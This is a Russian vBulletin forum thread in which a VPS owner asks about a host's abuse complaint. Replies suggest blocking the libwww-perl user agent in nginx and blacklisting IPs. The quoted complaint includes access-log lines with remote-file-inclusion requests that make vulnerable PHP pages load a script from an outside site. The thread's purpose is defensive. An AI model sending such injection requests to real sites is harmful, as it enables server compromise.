форум vBSupport.ru > vBulletin > Old vB versions (3.0.x & 2.x.x) > vBulletin 3.7.x > vBulletin [3.7] Troubleshooting and Problems
Register Меню vBsupport Изображения Files Manager О рекламе Today's Posts Search
  • Родная гавань
  • Блок РКН снят
  • Premoderation
  • For English speaking users
  • Каталог Фрилансеров
  • If you want to buy some product or script
  • Администраторам
VBsupport перешел с домена .ORG на родной .RU Ура! Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей

Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
for English speaking users:
You may be surprised with restriction of access to the attachments of the forum. The reason is the recent change in vbsupport.org strategy:

- users with reputation < 10 belong to "simple_users" users' group
- if your reputation > 10 then administrator (kerk, Luvilla) can decide to move you into an "improved" group, but only manually

Main idea is to increase motivation of community members to share their ideas and willingness to support to each other. You may write an article for the subject where you are good enough, you may answer questions, you may share vbulletin.com/org content with vbsupport.org users, receiving "thanks" equal your reputation points. We should not only consume, we should produce something.

- you may:
* increase your reputation (doing something useful for another members of community) and being improved
* purchase temporary access to the improved category:
10 $ for 3 months. - this group can download attachments, reputation/posts do not matter.
20 $ for 3 months. - this group can download attachments, reputation/posts do not matter + adds eliminated + Inbox capacity increased + files manager increased permissions.

Please contact kerk or Luvilla regarding payments.

Important!:
- if your reputation will become less then 0, you will be moved into "simple_users" users' group automatically.*
*for temporary groups (pre-paid for 3 months) reputation/posts do not matter.
Уважаемые пользователи!

На форуме открыт новый раздел "Каталог фрилансеров"

и отдельный раздел для платных заказов "Куплю/Закажу"

Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже:
Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота.
Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
 
 
 
 
FBI
Знаток
 
FBI's Avatar
Default что хостеры от меня хотят?
0

каждый день получаю от них письмо

Hello,

Currently we have received 1 abuse mail as a complain for your VPS. Please stop this type of attach as URL injection from your VPS or else we have to suspend your VPS. The abuse mails is as follows:
================================================== =====================
Greetings:

IP Address of attacker: 208.87.240.149

Type of attack: URL Injection -- attempt to inject / load files onto the
server via PHP/CGI vulnerabilities

Sample log report including date and time stamp (1st field is "request", 2nd
field is the IP address or the domain name being attacked, and the 3rd field
is the IP address or domain name of the attacker):

Request: generationword.estoreadvanced.biz 208.87.240.149 - -
[10/Feb/2009:15:41:22 -0500] "GET
/index.php?p=http://www.atbunet.org/web/safe1.txt??? HTTP/1.1" 500 653 "-"
"libwww-perl/5.813" - "-"

Request: sparta.estoreadvanced.biz 208.87.240.149 - - [10/Feb/2009:15:42:08
-0500] "GET /index.php?p=http://www.atbunet.org/web/safe1.txt??? HTTP/1.1"
500 637 "-" "libwww-perl/5.813" - "-"

Request: theadvocatemarketing.com 208.87.240.149 - - [10/Feb/2009:15:42:57
-0500] "GET /index.php?p=http://www.atbunet.org/web/safe1.txt??? HTTP/1.1"
500 635 "-" "libwww-perl/5.813" - "-"

Request: geminigreetings.com 208.87.240.149 - - [10/Feb/2009:15:43:58
-0500] "GET /index.php?p=http://www.atbunet.org/web/safe1.txt??? HTTP/1.1"
500 625 "-" "libwww-perl/5.813" - "-"

Request: pactradegroup.estoreadvanced.net 208.87.240.149 - -
[10/Feb/2009:15:45:10 -0500] "GET
/index.php?p=http://www.atbunet.org/web/safe1.txt??? HTTP/1.1" 500 651 "-"
"libwww-perl/5.813" - "-"

Request: fuseit.estoreadvanced.biz 208.87.240.149 - - [10/Feb/2009:15:45:21
-0500] "GET /index.php?p=http://www.atbunet.org/web/safe1.txt??? HTTP/1.1"
500 637 "-" "libwww-perl/5.813" - "-"

Request: foggyhollowgifts.com 208.87.240.149 - - [10/Feb/2009:16:45:03
-0500] "GET
/index.php?p=page&page_id=contact_us/index.php?p=http://www.atbunet.org/web/
safe1.txt??? HTTP/1.1" 500 627 "-" "libwww-perl/5.813" - "-"

Request: foggyhollowgifts.com 208.87.240.149 - - [10/Feb/2009:16:45:03
-0500] "GET /index.php?p=http://www.atbunet.org/web/safe1.txt??? HTTP/1.1"
500 627 "-" "libwww-perl/5.813" - "-"

NOTES:

URL Injection attacks typically mean the server for which the IP address of
the attacker is bound is a compromised server.

Please check the server behind the IP address above for suspicious files in
/tmp, /var/tmp, /dev/shm, /var/spool/samba, /var/spool/vbox,
/var/spool/squid, and /var/spool/cron Please use "ls -lab" for checking
directories as sometimes compromised servers will have hidden files that a
regular "ls" will not show.

Please also check the process tree (ps -efl or ps -auwx) for suspicious
processes; often times the malware / hack pretends to be an Apache process.

Clam Anti-virus, clamscan, can also be used to find commonly used PHP and
Perl-based hacks, including various php shells, on a server using the
"--infected" and "--recursive" options.

You may also want to check out using root kit detection tools -
http://www.chkrootkit.org/, http://www.rootkit.nl/, and http://
http://www.ossec.net/en/rootcheck.html as tools which should be used in
addition to checking the directories and process tree.

### EOF NOTES ###

Please take appropriate action to stop these attacks from happening.

Thank you very much for your time.

________________________________________________
Peter M. Abraham
Support and Customer Care Department
Dynamic Net, Inc.
Helping companies do business on the Net
13 Cowpath
Denver, PA 17517
Toll Free Voice: 1-888-887-6727
International: 1-717-484-1062
FAX: 1-717-484-1162
Web: http://www.dynamicnet.net/services/hsphere.htm
================================================== ========================
Thank You.

я чего то не понял , что они хотят?
Bot
Yandex Bot Yandex Bot is online now
 
Join Date: 05.05.2005
Реклама на форуме А что у нас тут интересного? =)
 
 
Martell
Эксперт
Master
 
Martell's Avatar
Default
1

Посмотри ссылку _http://www.atbunet.org/ и все поймешь...
 
 
FBI
Знаток
 
FBI's Avatar
Default
0

это как я понял , кто то взломал какой то сайт, а я тут причем ?)
 
 
kerk
k0t
 
kerk's Avatar
Default
1

нас тоже постоянно пробивают, частенько в "кто онлайн" вижу ссылки подобного вида
на Nginx повесил:
Code:
      if ($http_user_agent ~ libwww-perl) {
           #script kiddies
           return 404;
       }
от таких вот взломщиков
===
Quote:
Originally Posted by FBI View Post
а я тут причем ?
а тебя через взломаный сайт пытаются сломать
 
 
FBI
Знаток
 
FBI's Avatar
Default
0

а если зашита от этого ?
а то меня хостери могут закрыть..
 
 
kerk
k0t
 
kerk's Avatar
Default
1

Quote:
Originally Posted by FBI View Post
а если зашита
может есть и лучше, но пока можешь добавлять IP-шники в "блэк" апачу или в хтаксесс
 


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off




All times are GMT +4. The time now is 03:49 PM.


Powered by vBulletin® Version Alan Edition
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.